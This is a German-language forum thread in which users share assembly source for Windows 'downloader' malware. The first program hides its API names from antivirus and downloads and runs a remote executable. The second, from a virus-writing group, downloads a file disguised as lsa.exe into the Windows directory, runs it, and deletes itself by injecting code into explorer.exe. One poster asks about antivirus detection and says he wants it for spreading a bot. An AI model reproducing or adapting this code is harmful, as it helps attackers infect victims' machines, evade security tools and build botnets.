Simpler Webdownloader,
keine Ahnung für was man ihn brauchen kann, aber mir war langweilig.
include '%include%/WIN32AX.inc'
.data
url db "url",0
ziel db "C:\test.exe",0
;paar bytes reservieren
urlmon rd 10
Down rd 18
dllhandle rd 1
DownloadFile rd 1
.code
main:
;urlmon.dll runtime schreiben, wegen Avs
mov dword [urlmon], 'U3SM'
mov dword [urlmon+4d], 'ON.D'
mov word [urlmon+1d], 'RL'
mov word [urlmon+8d], 'LL'
;urlmon.dll laden
push urlmon
call [LoadLibraryA]
mov [dllhandle],eax
;URLDownloadToFileA runtime schreiben
mov dword [Down], 'UbcD'
mov dword [Down+4d], 'ownl'
mov dword [Down+8d], 'oRdT'
mov word [Down+1d], 'RL'
mov dword [Down+12d], 'oFil'
mov word [Down+16d], 'eA'
mov byte [Down+9d], 'a'
;Api Adresse
push Down
push [dllhandle]
call [GetProcAddress]
mov [DownloadFile],eax
;Donwload
push 0
push 0
push ziel
push url
push 0
call [DownloadFile]
;Ausführen
push SW_SHOWNORMAL
push NULL
push NULL
push ziel
push NULL
push HWND_DESKTOP
call [ShellExecuteA]
push 0
call [ExitProcess]
.end main
Hab hier auch noch einen, wie siehts mit der Detection Rate von deinem aus? eventuell was gutes für mich zum Bot spreaden wenn er Fud ist.
; Small selfdeleting downloader
; by DiA/RRLF (c)06
; www.vx-dia.de.vu
include "%fasminc%\win32ax.inc"
macro _invoke proc,[arg]
{ common
if ~ arg eq
reverse
pushd arg
common
end if
call [ebp + proc] }
entry DowloadFile
section '.code' code readable writeable executable
URL db "http://url.com/here.exe", 0 ;the executable to download
SaveAs db "\lsa.exe", 0 ;save as, in windows directory
InetHandle dd ?
UrlHandle dd ?
FileHandle dd ?
ReadNext dd ?
DownloadBuffer rb 1024d
BytesWritten dd ?
WindowsDir rb 256d
ProcessEntryOwn PROCESSENTRY32
SnapHandleOwn dd ?
ProcessHandle dd ?
BaseAddress dd ?
StartupInfo STARTUPINFO
ProcessInfo PROCESS_INFORMATION
DowloadFile:
invoke GetWindowsDirectory,\
WindowsDir,\
256d
invoke lstrcat,\
WindowsDir,\
SaveAs
invoke InternetOpen,\
URL,\
0,\
0,\
0,\
0
cmp eax, 0
je DownloadFileError
mov dword [InetHandle], eax
invoke InternetOpenUrl,\
dword [InetHandle],\
URL,\
0,\
0,\
0,\
0
cmp eax, 0
je DownloadFileError
mov dword [UrlHandle], eax
invoke CreateFile,\
WindowsDir,\
GENERIC_WRITE,\
FILE_SHARE_WRITE,\
0,\
CREATE_NEW,\
FILE_ATTRIBUTE_NORMAL,\
0
cmp eax, 0
je DownloadFileError
mov dword [FileHandle], eax
inc dword [ReadNext]
ReadNextBytes:
cmp dword [ReadNext], 0
je DownloadComplete
invoke InternetReadFile,\
dword [UrlHandle],\
DownloadBuffer,\
1024d,\
ReadNext
invoke WriteFile,\
dword [FileHandle],\
DownloadBuffer,\
dword [ReadNext],\
BytesWritten,\
0
jmp ReadNextBytes
DownloadComplete:
invoke CloseHandle,\
dword [FileHandle]
invoke InternetCloseHandle,\
dword [UrlHandle]
invoke InternetCloseHandle,\
dword [InetHandle]
invoke CreateProcess,\
WindowsDir,\
0,\
0,\
0,\
0,\
CREATE_NEW_CONSOLE,\
0,\
0,\
StartupInfo,\
ProcessInfo
DownloadFileError:
invoke GetModuleFileName,\
0,\
OwnFilename,\
256
invoke LoadLibrary,\
"kernel32.dll"
cmp eax, 0
je Exit
invoke GetProcAddress,\
eax,\
"DeleteFileA"
mov dword [_DeleteFile], eax
mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32
invoke CreateToolhelp32Snapshot,\
2,\
0
cmp eax, 0
je Exit
mov dword [SnapHandleOwn], eax
invoke Process32First,\
dword [SnapHandleOwn],\
ProcessEntryOwn
NextTargetProcess:
cmp eax, 0
je Exit
invoke lstrcmpi,\
ProcessEntryOwn.szExeFile,\
"explorer.exe"
cmp eax, 0
je FoundExplorer
invoke Process32Next,\
dword [SnapHandleOwn],\
ProcessEntryOwn
jmp NextTargetProcess
FoundExplorer:
invoke CloseHandle,\
dword [SnapHandleOwn]
invoke OpenProcess,\
PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\
0,\
dword [ProcessEntryOwn.th32ProcessID]
cmp eax, 0
je Exit
mov dword [ProcessHandle], eax
invoke VirtualAllocEx,\
dword [ProcessHandle],\
0,\
RemoteThreadEnd - RemoteThreadStart,\
MEM_COMMIT,\
PAGE_READWRITE
cmp eax, 0
je Exit
mov dword [BaseAddress], eax
invoke WriteProcessMemory,\
dword [ProcessHandle],\
dword [BaseAddress],\
RemoteThreadStart,\
RemoteThreadEnd - RemoteThreadStart,\
0
cmp eax, 0
je Exit
invoke CreateRemoteThread,\
dword [ProcessHandle],\
0,\
0,\
dword [BaseAddress],\
0,\
0,\
0
invoke CloseHandle,\
dword [ProcessHandle]
Exit:
invoke ExitProcess,\
0
RemoteThreadStart:
call DeltaOffset
DeltaOffset:
pop ebp
sub ebp, DeltaOffset
DeleteLoop:
lea eax, dword [ebp + OwnFilename]
_invoke _DeleteFile,\
eax
cmp eax, 0
je DeleteLoop
ReturnThread:
ret
RemoteDatas:
OwnFilename rb 256d
_DeleteFile dd ?
RemoteThreadEnd:
section '.idata' import data readable writeable
library kernel, "kernel32.dll",\
wininet, "wininet.dll"
import kernel,\
WriteFile, "WriteFile",\
CreateFile, "CreateFileA",\
CloseHandle, "CloseHandle",\
lstrcat, "lstrcatA",\
GetWindowsDirectory, "GetWindowsDirectoryA",\
GetModuleFileName, "GetModuleFileNameA",\
LoadLibrary, "LoadLibraryA",\
GetProcAddress, "GetProcAddress",\
CreateToolhelp32Snapshot, "CreateToolhelp32Snapshot",\
Process32First, "Process32First",\
Process32Next, "Process32Next",\
lstrcmpi, "lstrcmpiA",\
CreateProcess, "CreateProcessA",\
OpenProcess, "OpenProcess",\
VirtualAllocEx, "VirtualAllocEx",\
WriteProcessMemory, "WriteProcessMemory",\
CreateRemoteThread, "CreateRemoteThread",\
ExitProcess, "ExitProcess"
import wininet,\
InternetOpen, "InternetOpenA",\
InternetOpenUrl, "InternetOpenUrlA",\
InternetReadFile, "InternetReadFile",\
InternetCloseHandle, "InternetCloseHandle"
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.